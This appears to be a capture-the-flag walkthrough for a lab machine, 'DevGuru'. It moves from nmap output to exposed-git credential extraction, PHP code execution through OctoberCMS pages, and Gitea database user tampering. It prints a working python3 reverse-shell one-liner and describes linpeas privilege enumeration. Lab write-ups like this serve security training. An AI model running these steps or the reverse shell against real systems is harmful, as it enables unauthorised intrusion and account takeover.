Nmap scan report for [83/877]
Host is up (0.16s latency).
Not shown: 65532 closed ports
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)
| 256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)
|_ 256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: DevGuru
| http-git:
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: first commit
| Remotes:
| http://devguru.local:8585/frank/devguru-website.git
|_ Project type: PHP application (guessed from .gitignore)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corp - DevGuru
8585/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK [54/877]
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=f886af904a2de78a; Path=/; HttpOnly
| Set-Cookie: _csrf=5bPJDT7tyJUhTZEjhejaOuL5wHU6MTYwNzE2ODk5ODQ5MDExOTg3MQ; Path=/; Expires=Sun, 06 Dec 2020 11:49:58 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Sat, 05 Dec 2020 11:49:58 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title> Gitea: Git with a cup of tea </title>
| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
| <meta name="description" content="Gitea (Git with a cup of tea) is a painless
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=f1edb5b66713a6a2; Path=/; HttpOnly
| Set-Cookie: _csrf=5rcSOwMuyIXJxXduyRO14YPZQT06MTYwNzE2ODk5ODgzMzcyMzg5Mg; Path=/; Expires=Sun, 06 Dec 2020 11:49:58 GMT; HttpOnly
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Page Not Found - Gitea: Git with a cup of tea </title>
| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
|_ <meta name="description" content="Gitea (Git with a c
We don't see anything interesting on the web page. Looking at the nmap results there's a git
directory we find so let's visit that directory
On visting find a page which tells us a reference to master branch
So it seems that there is a github repository on the box , so let's try to dump the files. We can use a tool for that which is called GitTools
After running the tool it took 22 minutes for me dump the ./git
Now we cannot extract some useful data like this for that we have to use Extractor
from GitTools
First move that dumped ./git
folder to a another folder then run the tool
As you can see it finds a bunch of files which makes our work way easier
Reading through the contents of .htaccess
we find that there is a login page for database
Going back to that extracted folder of ./git
we can find config/database.php
which has credentials for mysql database
And we can login ourself in , Great !
Now Octobercms
has blocked extensions of php
files , you could try changing the extensions to .php3,.php4,.php5,.phtml but it won't work , what we can do is run php code on html pages
Here it tells how we can do that
As we can see it does run php code so now we have to craft a php reverse shell to get onto the box,Let's test this for a simple $_GET["command"]
And we can run system commands so only thing left to do is to setup a netcat listener and run a reverse shell command in that parameter.So I am going to use a python3 reverse shell because python3 is installed on the box
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And we got a shell finally , sweet !!
Now we must enumerate the box , to do that transfer linpeas
on the target box by python http server
During the enumaration process we find some intersting backup files
Here we can see that there is another database for gitea
which is running on port 8585,also we look at the bottom we'll find that we can use three hashing algorithms bcrypt
and scrypt
So let's login to the database like we did with octoberdb
Here I cloned the frank
user but added a bcrpyt
password for him because with pbkdf2
it was not allowing me to login
DB_TYPE = mysql
NAME = gitea
USER = gitea
; Use PASSWD = `your password` for quoting if you use special characters in the password.
Here we can find the password for frank
but it's saved as bcrypt because of $2$
at the beginning.It would be useless to try cracking the hash we can just add a user with the password encrypted with bcrypt
Then if we try to login we can access the dashboard of OctoberCMS
By going to Settings
then Event log
we can see there's an image